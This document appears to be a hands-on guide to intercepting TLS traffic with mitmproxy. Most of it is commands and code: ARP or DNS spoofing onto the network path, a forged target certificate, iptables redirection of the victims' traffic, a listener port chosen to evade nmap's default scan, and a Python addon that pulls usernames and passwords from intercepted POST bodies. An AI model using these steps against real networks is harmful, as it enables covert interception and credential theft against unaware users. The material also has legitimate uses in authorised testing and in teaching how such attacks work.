first of all, you need to be on the network path, be it as the existing gateway, by means of dns or arp spoofing, whatever. in any case, make sure you have a working gateway and resolvers yourself so you can relay the traffic. on the client's side everything looks normal except the first hop.
you can run mitmproxy as an unprivileged user on an exotic local port, as long as the interception itself (the iptables redirect below, which needs root) is in place.
there are three ways to get mitmproxy for ssl interception: as a package, from source, or with the latest released binaries
as package
#apt install mitmproxy
#dpkg -l | grep mitm
from scratch
apt install python3 python3-venv #python3-pip
git clone https://github.com/mitmproxy/mitmproxy.git
cd mitmproxy/
./dev.sh
. venv/bin/activate
mitmproxy --version
grab the latest release
as root
wget https://snapshots.mitmproxy.org/7.0.4/mitmproxy-7.0.4-linux.tar.gz
mkdir -p mitm/
tar xzf mitmproxy-7.0.4-linux.tar.gz -C mitm/
ls -alF mitm/
chown root:root mitm/*
mv mitm/* /usr/local/bin/
rmdir mitm/
as user
let's have a look at what you need to impersonate (the CN, SANs and issuer the client currently sees)

echo Q | openssl s_client -servername TARGET-VHOST -connect TARGET-HOST:443 \
    | openssl x509 -noout -text
ideally you get a real cert for the target, but a self-signed one is enough for a PoC (curl -k accepts it; browsers will complain, and recent ones also want a subjectAltName, not just a CN)

cd ~/certs/
openssl req -x509 -newkey rsa:2048 -nodes \
    -subj /CN=DOMAIN \
    -keyout DOMAIN.self.key \
    -out DOMAIN.self.crt
mitmproxy wants CRT + KEY concatenated into one PEM file

cat DOMAIN.self.crt DOMAIN.self.key > DOMAIN.self.pem
chmod 400 *.crt *.key *.pem
start mitmproxy either with its TUI (which truly eats your memory on a long capture) or in tcpdump-like fashion with mitmdump (writes the flows to a file)

echo $LANG
#export LANG=en_US.UTF-8
mitmproxy --version
mitmproxy -h | less
mitmproxy --options | less
# block_global=false: also accept clients coming from public (non-RFC1918) addresses
# --mode transparent: expect iptables-redirected connections, not explicit proxy requests
mitmproxy -p 33231 \
    --set block_global=false \
    --mode transparent --showhost \
    --set console_mouse=false
ls -alF $HOME/.mitmproxy/
now intercepting ONLY example.net and passing everything else through untouched (no certificate swap, the bytes are just relayed).
same as above but with
--ignore-hosts '^(?![0-9\.]+:)(?!([^\.:]+\.)*example\.net:)' \
--certs example.net=example.net.self.pem
# --ssl-insecure
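before pointing victims at the box, it is worth checking what that ignore-hosts pattern really lets through. the following is an added check written for this page (my code, not the author's and not part of mitmproxy): it runs the exact same regex through Python's re module, which is what mitmproxy uses, against a constructed list of SNI values. the host list and the 192.0.2.10 address are made up.

```python
import re

# The ignore_hosts pattern from the mitmdump command above. mitmproxy tests its
# ignore_hosts regexes against "host:port" (the SNI, and the server address),
# so the pattern has to deal with the trailing ":port".
IGNORE_HOSTS = r"^(?![0-9\.]+:)(?!([^\.:]+\.)*example\.net:)"
_rex = re.compile(IGNORE_HOSTS)


def is_passed_through(host: str, port: int = 443) -> bool:
    """True if a connection with this SNI/host would be ignored, i.e. relayed untouched."""
    return _rex.search(f"{host}:{port}") is not None


def classify(hosts):
    """Map each host to the verdict mitmproxy would reach with the pattern above."""
    return {h: ("pass-through" if is_passed_through(h) else "intercept") for h in hosts}


# Constructed SNI values a client on the victim side might send (not captured data).
SAMPLE_HOSTS = [
    "example.net",           # the target itself
    "www.example.net",       # subdomain of the target
    "notexample.net",        # same suffix, different label: must NOT be intercepted
    "example.net.evil.com",  # target name as a prefix only: must NOT be intercepted
    "192.0.2.10",            # bare IP (no SNI): intercepted, we cannot tell what it is
    "www.google.com",        # everything else
]

if __name__ == "__main__":
    for host, verdict in classify(SAMPLE_HOSTS).items():
        print(f"{host:24} {verdict}")
```

the two negative lookaheads do the work: the first one makes sure bare IPs (clients without SNI) are still intercepted, the second one anchors example.net on a label boundary so notexample.net and example.net.evil.com are relayed untouched.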
mitmdump --version
mitmdump -h | less
mitmdump --options | less
don’t ask me why we need an absolute path there
mkdir -p /data/dumps/
date=`date +%s`
# mitmproxy's own variable for the NSS key log (for wireshark), not SSLKEYLOGFILE
export MITMPROXY_SSLKEYLOGFILE="/data/dumps/$date.sslkeylogfile.txt"
#SSLKEYLOGFILE=
echo $date
#echo $SSLKEYLOGFILE
echo $MITMPROXY_SSLKEYLOGFILE
mitmdump -p 33231 \
    --set block_global=false \
    --mode transparent --showhost \
    --ignore-hosts '^(?![0-9\.]+:)(?!([^\.:]+\.)*example\.net:)' \
    --certs example.net=$HOME/certs/example.net.self.pem \
    -w /data/dumps/$date.mitmdump --flow-detail 0
mitmproxy's default port is 8080, for both http and https. we use a port that is not in nmap's top 1000 so the listener does not show up in a default scan.
# $nic is the interface the victims sit behind: forward their packets and do not
# send icmp redirects that would tell them about the real gateway
nic=virbr0
sysctl -w net.ipv4.ip_forward=1
sysctl net.ipv4.ip_forward
sysctl -w net.ipv4.conf.$nic.send_redirects=0
sysctl net.ipv4.conf.$nic.send_redirects
# redirect the victims' 443 to the local mitm listener (add a --dport 80 rule if you want plain http too)
iptables -t nat -A PREROUTING -i $nic -p tcp --dport 443 -j REDIRECT --to-port 33231
iptables -nvL -t nat
from the victim/client (the first curl fails on the self-signed cert, the second one accepts it with -k)

curl -i https://example.net/
curl -ik https://example.net/
netstat -lntup
cd /data/dumps/
# quick and dirty: bodies are stored as received, so this only hits uncompressed bodies
grep -a UserName $date.mitmdump
grep -a Password $date.mitmdump

refine your filter offline (-n: do not start the proxy, -r: read the dump; the last argument is a filter expression)

cd /data/dumps/
mitmdump -nr $date.mitmdump "~m get"
mitmdump -nr $date.mitmdump "~m post"
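instead of grepping the raw dump, the same search can be done with a small mitmproxy addon that runs either live (append -s credlog.py to the mitmdump command) or over the saved dump (mitmdump -nr $date.mitmdump -s credlog.py). the following is an added example written for this page, not code from the author or the mitmproxy project; the credential field names and the sample POST body are assumptions/constructed, and the _Sample* classes exist only so the hook can be exercised without mitmproxy installed.

```python
"""credlog.py: mitmproxy addon that pulls credential-looking fields out of POST bodies."""
import json
import logging
from urllib.parse import parse_qsl

# Field names that usually carry credentials. Assumption: extend for the target's login form.
CRED_FIELDS = {"username", "user", "login", "email", "password", "pass", "passwd", "pwd"}


def extract_credentials(body: str, content_type: str = "") -> dict:
    """Return {field: value} for credential-looking fields in a form or JSON body.

    Unknown content types return {} so binary bodies are never parsed.
    """
    ct = content_type.lower()
    if "application/x-www-form-urlencoded" in ct:
        pairs = parse_qsl(body, keep_blank_values=True)
    elif "application/json" in ct:
        try:
            data = json.loads(body)
        except ValueError:
            return {}
        pairs = data.items() if isinstance(data, dict) else []
    else:
        return {}
    return {k: v for k, v in pairs if str(k).lower() in CRED_FIELDS}


class CredLogger:
    """mitmproxy addon: the request() hook fires for live and replayed (-nr) flows alike."""

    def __init__(self):
        self.found = []  # (host, path, {field: value}) per hit

    def request(self, flow):
        req = flow.request
        if req.method != "POST":
            return
        # get_text() undoes content-encoding and charset; strict=False tolerates junk bytes
        body = req.get_text(strict=False) or ""
        creds = extract_credentials(body, req.headers.get("content-type", ""))
        if creds:
            self.found.append((req.pretty_host, req.path, creds))
            # plain logging: mitmproxy 9+ routes it into its event log, older versions print to stderr
            logging.warning("creds on %s%s: %s", req.pretty_host, req.path, creds)


addons = [CredLogger()]


# --- constructed sample so the addon can be exercised without mitmproxy installed ---

class _SampleRequest:
    """Stand-in for mitmproxy's Request exposing just the attributes the hook uses."""

    def __init__(self, method, host, path, headers, body):
        self.method, self.pretty_host, self.path = method, host, path
        self.headers, self._body = headers, body

    def get_text(self, strict=True):
        return self._body


class _SampleFlow:
    def __init__(self, request):
        self.request = request


SAMPLE_LOGIN_BODY = "UserName=alice&Password=s3cret%21&remember=1"  # constructed, not captured


def run_sample():
    """Feed one constructed login POST and one GET through the addon; return what it found."""
    logger = CredLogger()
    logger.request(_SampleFlow(_SampleRequest(
        "POST", "example.net", "/login",
        {"content-type": "application/x-www-form-urlencoded"}, SAMPLE_LOGIN_BODY)))
    logger.request(_SampleFlow(_SampleRequest("GET", "example.net", "/", {}, "")))
    return logger.found


if __name__ == "__main__":
    for host, path, creds in run_sample():
        print(host, path, creds)
```

because the hook goes through get_text(), compressed bodies are handled too, which the grep -a above cannot do; and with -nr the addon sees every saved flow exactly as it would have live.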
Introduction https://docs.mitmproxy.org/stable/
Wireshark and SSL/TLS Master Secrets https://docs.mitmproxy.org/stable/howto-wireshark-tls/
Transparent Proxy https://docs.mitmproxy.org/stable/concepts-modes/#transparent-proxy
Transparent Proxying https://mitmproxy.readthedocs.io/en/v2.0.2/transparent.html
Mitmproxy Core Features https://docs.mitmproxy.org/stable/overview-features/
How To: Use mitmproxy to read and modify HTTPS traffic https://blog.heckel.xyz/2013/07/01/how-to-use-mitmproxy-to-read-and-modify-https-traffic-of-your-phone/
Ignoring Domains https://docs.mitmproxy.org/master/howto-ignoredomains/
Ignore Domains https://mitmproxy.readthedocs.io/en/v2.0.2/features/passthrough.html
Ignor regex exclude not working #3013 https://github.com/mitmproxy/mitmproxy/issues/3013
mitmdump https://mitmproxy.readthedocs.io/en/v2.0.2/mitmdump.html
Filter expressions https://mitmproxy.readthedocs.io/en/v2.0.2/features/filters.html
Top 1,000 TCP and UDP ports (nmap default) https://nullsec.us/top-1-000-tcp-and-udp-ports-nmap-default/
Port Selection Data and Strategies https://nmap.org/book/performance-port-selection.html
SecLists/Discovery/Infrastructure/nmap-top1000-ports.txt https://github.com/danielmiessler/SecLists/blob/master/Discovery/Infrastructure/nmap-top1000-ports.txt